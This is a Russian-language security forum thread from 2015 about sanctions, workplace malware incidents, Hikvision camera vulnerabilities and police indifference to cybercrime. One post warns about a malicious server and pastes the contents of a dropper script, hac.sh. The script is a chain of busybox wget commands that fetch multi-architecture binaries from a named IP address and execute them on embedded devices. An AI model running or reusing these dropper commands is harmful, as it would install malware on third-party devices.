Форум Системы безопасности / Форум по информационной безопасности /
egor
Бывалый
Сообщений: 459
Рейтинг:
26.07.2015 18:19:23
санкции помогут и подымут отечественного разработчика изолировав доступ зарубеного софта и....!!!
Так вот национальная платёжная система и задумывалась в рамках антикризисного импортозамещения. И вот-те нате, хрен в томате. Ну вот вам ссылка на интервью Хазина http://worldcrisis.ru/crisis/1966362 Где-то на 9мин. 30 сек эпизод о платёжных системах, посмотрите, там немного. Ну о какой ЗИ может идти речь в таких условиях?
В рамках интернет пространства как может, должен решаться подобный вопрос: частных лиц, организаций, оказавшихся в такой ситуации. Только без натаций. По пунктам. Факт случился. Что делать?Был в такой ситуации - информационщики из-за тормозов отключили втихушу антивирус на нескольких серверах (косяк №1), а потом одна из них затолкала в сервер (!!!) флэшину заразную, корова блин (косяк №2). Потом ещё оказалось, что они на ряде машин в сети меняли систему и не поставили в известность нас - отдел ЗИ, там антивируса не было (косяк №3). Ну и фсё: staxnet во всей красе. Ладно не агрессивный он, тормозил только. Кое-как опердень закрыли, на ночь остались, сервера оттарабанили и защитили, а потом до месяца где-то из рабочих станций остатки соплей выгребали.
iTuneDVR
Старожил
Сообщений: 547
Рейтинг:
26.07.2015 19:39:26
Так посмотрим.
Санкции слава Богу никто не отменял, как и принятые недавно указы президента про софт.
Поглядим как одно с другим будет стыковатися ;)
Был в такой ситуации - информационщики из-за тормозов отключили втихушу антивирус на нескольких серверах (косяк №1), а потом одна из них затолкала в сервер (!!!) флэшину заразную, корова блин (косяк №2). Потом ещё оказалось, что они на ряде машин в сети меняли систему и не поставили в известность нас - отдел ЗИ, там антивируса не было (косяк №3). Ну и фсё: staxnet во всей красе. Ладно не агрессивный он, тормозил только. Кое-как опердень закрыли, на ночь остались, сервера оттарабанили и защитили, а потом до месяца где-то из рабочих станций остатки соплей выгребали.
Бывает!
А бывает и по другому, когда всё чин по чину и всё включено, запущено и настроено и все абсолютно уверены, что круто и неуязвимо и по другому просто и быть не может и никто не виноват и все вроде бы при деле, а....
.... а на самом деле чёрные дыры наружу и такие большие, но их никто не видит, но утёчка за учётчкой.
egor
Бывалый
Сообщений: 459
Рейтинг:
27.07.2015 10:10:49
.... а на самом деле чёрные дыры наружу и такие большие,
Админы зело любят калитки себе задние оставлять, чтобы из дома разруливать.
iTuneDVR
Старожил
Сообщений: 547
Рейтинг:
27.07.2015 11:34:52
egor!
Админы зело любят калитки себе задние оставлять, чтобы из дома разруливать.
Если бы это было бы действительно так, то.... возможно соглашусь, однако.... ;)
Никто более высказаться в этой теме не желает?
Юрий Гедзберг
Старожил
Сообщений: 8652
Рейтинг:
28.07.2015 12:43:09
Есть такая штука, которая называется "массовое сознание", которое обычно выражается фразами типа "но ведь все говорят!" или "но ведь там написано!".
Пример этого - выступление iTuneDVR, который упомянул компанию Hikvision. Реакция народа? Да ну и плевать! Почему? Хотя бы потому, что:
"According to the latest report from business information provider IHS Inc. (NYSE: IHS), Hikvision has strengthened its position as the world’s leading CCTV and video surveillance equipment company - for the fourth year in a row that Hikvision has topped the list. The company’s dominant 16.3% total market share in terms of revenue is up by more than 50% compared with the previous year and more than double its 8% market share of just two years ago."
http://www.securityworldhotel.com/int/News/Business-News/hikvision-claims-top-position-in-world-video-surveillance#.VbdODflei4o
egor
Бывалый
Сообщений: 459
Рейтинг:
28.07.2015 21:11:21
Реакция народа? Да ну и плевать! Почему?
А чего вы ожидали? Мы живем в компьютерном мире, наши ОС сканируют наши данные, связи и поводение, собирают статистику и куда-то её отдают. Мы храним инфоррмацию в электронных облаках, увешав свои уши лапшой о её неприкосновенности. В начале 80-х появился первый компьютерный вирус, через 30 лет мы не представляем жизни без антивирусов, и хрен его знает, что на самом деле представляют они из себя, что ловят, а что пропускают. Наши смартфоны, планшеты и ноуты - это милые карманные шпионы (другое дело нужны ли мы кому-нибудь, но, если нужны, то точно шпионы). В наших домах всё больше устройств, управляемых по интернету, наши деньги зависят от прихоти платёжных систем. Мы всё больше зависимы от виртуального мира и всё ближе к состоянию, когда любого из нас можно будет просто выключить или затереть. И мы об этом знаем, но нам так комфортнее.
И что, на фоне этого великолепия известие об уязвимости Хиков должно вызвать священный трепет? УЖОЗ!!! Привыкли уже, не страшно. Просто ещё один штришок в "картину маслом". Страшнее будет, если вся эта хрупкая система заклинит. Вот она где башня вавилонская, и никаких идиотских высотных сооружений выше облаков.
Gens
Новичок
Сообщений: 12
Рейтинг:
28.07.2015 22:44:06
По сути ясно что это такое, а вот кто этим должен заниматься, вот вопрос???
Органы соответствующие должны, вот только пока не придешь к ним с письменым заявлением, чесаться они не начнут. А придешь с заявлением, придумают сто причин не принимать его. А то еще хлеще виноватым сделают.iTuneDVR
Старожил
Сообщений: 547
Рейтинг:
30.07.2015 18:51:25
Солдат спит - служба идёт, а создатели вредоносного кода не сидят сложа руки, а действуют беЗнаказанно!!!
На сегодняшний день запрос к адресу IP 185.11.146.114 из темы http://itunedvr.ru/forum/phpBB3/posting.php?mode=reply&f=35&t=414#pr1559 даёт файл hac.sh в котором обновился адрес скачивания вредоносного кода 89.248.174.55
По геолокации теперь это Нидерланды, однако исходный адрес всё еще работает и отдаёт скрипт!!!
Оригинальный пост http://itunedvr.ru/forum/phpBB3/viewtopic.php?f=35&t=414&p=1572#p1572
Если внимательно присмотреться, то в скрипте есть подвижки!!!Исполняемый вредоносный код кросскомпилирован уже под большее количество платформ!!!
busybox wget http://89.248.174.55/ppc440x; cp /bin/busybox ./; cat ppc440x >;;;;; busybox; rm ppc440x; cp busybox ppc440x; rm busybox; ./ppc440xbusybox wget http://89.248.174.55/ppcx; cp /bin/busybox ./; cat ppcx >;;;;; busybox; rm ppcx; cp busybox ppcx; rm busybox; ./ppcxbusybox wget http://89.248.174.55/sh4x; cp /bin/busybox ./; cat sh4x >;;;;; busybox; rm sh4x; cp busybox sh4x; rm busybox; ./sh4xbusybox wget http://89.248.174.55/arm4x; cp /bin/busybox ./; cat arm4x >;;;;; busybox; rm arm4x; cp busybox arm4x; rm busybox; ./arm4xbusybox wget http://89.248.174.55/arm5x; cp /bin/busybox ./; cat arm5x >;;;;; busybox; rm arm5x; cp busybox arm5x; rm busybox; ./arm5xbusybox wget http://89.248.174.55/arm6x; cp /bin/busybox ./; cat arm6x >;;;;; busybox; rm arm6x; cp busybox arm6x; rm busybox; ./arm6xbusybox wget http://89.248.174.55/mipsx; cp /bin/busybox ./; cat mipsx >;;;;; busybox; rm mipsx; cp busybox mipsx; rm busybox; ./mipsxbusybox wget http://89.248.174.55/mipselx; cp /bin/busybox ./; cat mipselx >;;;;; busybox; rm mipselx; cp busybox mipselx; rm busybox; ./mipselxbusybox wget http://89.248.174.55/sparcx; cp /bin/busybox ./; cat sparcx >;;;;; busybox; rm sparcx; cp busybox sparcx; rm busybox; ./sparcxbusybox wget http://89.248.174.55/i586x; cp /bin/busybox ./; cat i586x >;;;;; busybox; rm i586x; cp busybox i586x; rm busybox; ./i586xbusybox wget http://89.248.174.55/i686x; cp /bin/busybox ./; cat i686x >;;;;; busybox; rm i686x; cp busybox i686x; rm busybox; ./i686xbusybox wget http://89.248.174.55/x86_64x; cp /bin/busybox ./; cat x86_64x >;;;;; busybox; rm x86_64x; cp busybox x86_64x; rm busybox; ./x86_64xbusybox wget http://89.248.174.55/m68kx; cp /bin/busybox ./; cat m68kx >;;;;; busybox; rm m68kx; cp busybox m68kx; rm busybox; ./m68kxРост на лицо, а угроза очевидна!!!Мне вот интересно, когда это станет интересно компетентным органам и когда они прикроют, как минимум Российский IP 185.11.146.114 ???Freeze
Бывалый
Сообщений: 460
Рейтинг:
30.07.2015 23:16:18
Сегодня работал с РЧСовцами . Общался с рядовыми сотрудниками.Говорят никто сейчас не занимается реальными поисками радиопомех,все ударились в компьютеризацию всех процессов ,и практически никто уже не работает на "выездах" только за большую деньгу.
egor
Бывалый
Сообщений: 459
Рейтинг:
31.07.2015 17:47:20
Сегодня работал с РЧСовцами
Насколько я понимаю, РЧС никаким боком не относится к вопросам вредоносных кодов. А, взглянув на первую фразу на странице "ФГУП Главный радиочастотный центр", окончательно теряешь веру в перспективы человечества как разумного вида:
Разъяснения, касающиеся организации платежной дисциплины во ФГУП «ГРЧЦ» при исполнении договоров на экспертизу электромагнитной совместимости
Блин, хоть бы пару фраз лирических о высоком предназначении накорябали.